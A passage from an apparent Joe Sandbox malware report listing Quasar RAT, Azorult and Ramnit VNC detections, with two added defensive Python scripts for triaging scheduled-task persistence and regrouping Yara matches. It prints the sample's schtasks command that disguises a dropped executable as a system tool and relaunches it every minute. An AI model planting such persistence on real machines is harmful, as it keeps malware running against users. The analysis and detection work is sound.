                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 86%, Virustotal
                                        • Detection: 93%, ReversingLabs
                                        Reputation:moderate

                                        General

                                        Start time:01:36:05
                                        Start date:29/09/2021
                                        Path:C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        Imagebase:0xdb0000
                                        File size:2111264 bytes
                                        MD5 hash:B0B78DA613422BE0DE8DE2E2A2D0CE68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:01:36:06
                                        Start date:29/09/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
                                        Imagebase:0x2d0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
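The schtasks.exe command line above creates a task named like the Realtek audio service (RtkAudioService64) whose action is the dropped copy under the user profile, a path that reuses the name of the genuine System32 tool SystemPropertiesPerformance.exe, and re-launches it every minute, overwriting any existing task of that name. The parser and scoring below are an added example, not tooling from the Joe Sandbox report: OBSERVED is the command line as the report records it, BENIGN is a constructed contrast case, and the flagged path prefixes, the masquerade name list and the thresholds are my own assumptions.

```python
"""Triage a schtasks.exe /create command line for persistence indicators.

Added example, not part of the Joe Sandbox report. OBSERVED is the command
line the report records; BENIGN is constructed for contrast. The path
prefixes, masquerade names and scoring rules are assumptions of this example.
"""
from dataclasses import dataclass
from typing import List, Optional

OBSERVED = ("'C:\\Windows\\SysWOW64\\schtasks.exe' /create /tn RtkAudioService64 "
            "/tr 'C:\\Users\\user\\btpanui\\SystemPropertiesPerformance.exe' "
            "/sc minute /mo 1 /F")
BENIGN = ('schtasks /create /tn "AdobeUpdate" '
          '/tr "C:\\Program Files\\Adobe\\ARM\\1.0\\AdobeARM.exe" /sc daily /st 12:00')

# Locations a low-privilege user can write to (assumed list). Installers put
# task actions under Program Files or the Windows directory, not here.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Genuine System32 binary names that droppers reuse for their payloads
# (assumed list; SystemPropertiesPerformance.exe really ships in System32).
SYSTEM32_NAMES = {"systempropertiesperformance.exe", "svchost.exe", "conhost.exe",
                  "rundll32.exe", "dllhost.exe"}


def tokenize(cmdline: str) -> List[str]:
    """Split on whitespace, honouring '...' and "..." quoting. There is no
    escape processing, so backslashes in Windows paths survive intact."""
    tokens, cur, quote = [], "", None
    for ch in cmdline:
        if quote:
            if ch == quote:
                quote = None
            else:
                cur += ch
        elif ch in "'\"":
            quote = ch
        elif ch.isspace():
            if cur:
                tokens.append(cur)
                cur = ""
        else:
            cur += ch
    if cur:
        tokens.append(cur)
    return tokens


@dataclass
class TaskCreate:
    name: str = ""
    action: str = ""
    schedule: str = ""   # /sc value, lower-cased
    modifier: int = 0    # /mo value, 0 when absent
    force: bool = False  # /F present


def parse_schtasks_create(cmdline: str) -> Optional[TaskCreate]:
    """Return the /create parameters, or None if this is not schtasks /create."""
    toks = tokenize(cmdline)
    if not toks or not toks[0].lower().endswith(("schtasks", "schtasks.exe")):
        return None
    low = [t.lower() for t in toks]
    if "/create" not in low:
        return None
    task, i = TaskCreate(), 1
    while i < len(toks):
        opt = low[i]
        val = toks[i + 1] if i + 1 < len(toks) else ""
        if opt == "/tn":
            task.name, i = val, i + 2
        elif opt == "/tr":
            task.action, i = val, i + 2
        elif opt == "/sc":
            task.schedule, i = val.lower(), i + 2
        elif opt == "/mo":
            task.modifier, i = (int(val) if val.isdigit() else 0), i + 2
        elif opt == "/f":
            task.force, i = True, i + 1
        else:
            i += 1
    return task


def interval_minutes(task: TaskCreate) -> Optional[int]:
    """Repeat interval in minutes for the repeating schedules, None otherwise."""
    unit = {"minute": 1, "hourly": 60, "daily": 1440}.get(task.schedule)
    return None if unit is None else unit * (task.modifier or 1)


def assess(task: TaskCreate) -> List[str]:
    """Human-readable indicators; an empty list means nothing stood out."""
    flags = []
    action = task.action.lower()
    if action.startswith(USER_WRITABLE):
        flags.append("action lives in a user-writable path")
    if action.rsplit("\\", 1)[-1] in SYSTEM32_NAMES and not action.startswith("c:\\windows\\"):
        flags.append("action reuses a System32 binary name outside C:\\Windows")
    mins = interval_minutes(task)
    if mins is not None and mins <= 5:
        flags.append(f"repeats every {mins} min (watchdog-style persistence)")
    if task.force:
        flags.append("/F silently replaces an existing task of the same name")
    return flags
```

Run over OBSERVED this yields all four indicators; over BENIGN it yields none. The same parser can be pointed at Sysmon event 1 or Security 4688 command lines where schtasks.exe is the image, which is where this persistence would first show up on a live host.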

                                        General

                                        Start time:01:36:07
                                        Start date:29/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:01:36:08
                                        Start date:29/09/2021
                                        Path:C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                                        Imagebase:0xa40000
                                        File size:2111272 bytes
                                        MD5 hash:9423821A023FB02427783F6385871B3B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Azorult_1, Description: Azorult Payload, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        Reputation:low
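The Yara matches above are listed flat, one line per memory region, which hides which family ended up in which process. Each memory-dump Source name starts with the report's own process index (4 for vnc.exe, 5 for svchost.exe, 6 for windef.exe, 7 for CVbJSUXraQ.exe, 0xA for SystemPropertiesPerformance.exe) and carries the region's base address as its fourth field, so the lines can be regrouped by process. The script below is an added example, not part of the Joe Sandbox report: REPORT_LINES is a subset of the match lines above copied verbatim, while the rule-to-family mapping and the reading of the .sdmp name fields are my own assumptions. The regrouped view makes one point explicit that the flat list does not: svchost.exe has Ramnit VNC and keylogger matches only in memory and none on its own image file, which is what injection into a system process looks like and is the basis for the "Suspicious Svchost Process" signature.

```python
"""Regroup Joe Sandbox Yara match lines by process index.

Added example, not part of the report. REPORT_LINES are copied verbatim from
the report's process entries; PROCESSES is taken from the same entries. The
family mapping and the .sdmp field reading are assumptions of this example.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

REPORT_LINES = [
    "Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel",
    "Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\\Users\\user\\AppData\\Local\\Temp\\vnc.exe, Author: Joe Security",
    "Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security",
    "Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth",
    "Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\\Users\\user\\AppData\\Local\\Temp\\windef.exe, Author: Florian Roth",
    "Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security",
]

# Process index -> image path, as listed in the report's process entries.
PROCESSES = {
    4: r"C:\Users\user\AppData\Local\Temp\vnc.exe",
    5: r"C:\Windows\System32\svchost.exe",
    6: r"C:\Users\user\AppData\Local\Temp\windef.exe",
    7: r"C:\Users\user\Desktop\CVbJSUXraQ.exe",
    10: r"C:\Users\user\btpanui\SystemPropertiesPerformance.exe",
}

# Rule-name fragment -> family label (my own grouping of the rules in the report;
# order matters, the first matching fragment wins).
FAMILY_BY_RULE = [("azorult", "Azorult"), ("quasar", "Quasar"), ("xrat", "Quasar"),
                  ("ramnitvnc", "Ramnit VNC"), ("hvnc", "hidden VNC"),
                  ("keylogger", "keylogger (generic)")]

LINE_RE = re.compile(r"Rule: (?P<rule>[^,]+), Description: (?P<desc>.*?), "
                     r"Source: (?P<src>.*?), Author: (?P<author>.+)$")
# Dump names look like IDX.PHASE.DUMPID.BASE.X.Y.sdmp. The first field is the
# process index and the fourth the region base address (both line up with the
# report's process entries); the remaining fields are left unparsed here.
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
                     r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")


def family_of(rule: str) -> str:
    low = rule.lower()
    for fragment, family in FAMILY_BY_RULE:
        if fragment in low:
            return family
    return "unclassified"


def parse_match(line: str) -> Optional[dict]:
    """One report line -> dict with family and either (process, base) or file."""
    m = LINE_RE.search(line.strip().lstrip("• "))
    if not m:
        return None
    rec = {"rule": m["rule"], "family": family_of(m["rule"]), "author": m["author"],
           "process": None, "base": None, "file": None}
    d = SDMP_RE.match(m["src"])
    if d:
        rec["process"] = int(d.group(1), 16)
        rec["base"] = int(d.group(4), 16)
    else:
        rec["file"] = m["src"]
    return rec


def summarize(lines: List[str]) -> Dict[int, dict]:
    """Per process index: families seen in memory and families matched on the
    image file the process ran from."""
    mem, disk = defaultdict(set), defaultdict(set)
    for line in lines:
        rec = parse_match(line)
        if rec is None:
            continue
        if rec["process"] is not None:
            mem[rec["process"]].add(rec["family"])
        else:
            for idx, path in PROCESSES.items():  # map the file back to its process
                if path.lower() == rec["file"].lower():
                    disk[idx].add(rec["family"])
    return {idx: {"image": PROCESSES.get(idx, "unknown"),
                  "memory": mem.get(idx, set()), "on_disk": disk.get(idx, set())}
            for idx in sorted(set(mem) | set(disk))}


def system_binaries_with_matches(summary: Dict[int, dict]) -> List[int]:
    """Windows system binaries carrying malware families in memory: these are
    injection targets rather than dropped payloads."""
    return [idx for idx, s in summary.items()
            if s["image"].lower().startswith("c:\\windows\\") and s["memory"]]
```

Feeding the full match list from the report into summarize() instead of the subset gives the complete family-per-process map; the on_disk set is what an antivirus scan of the dropped files would see, and the difference between memory and on_disk is what a memory scan adds.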

                                        Disassembly

                                        Code Analysis
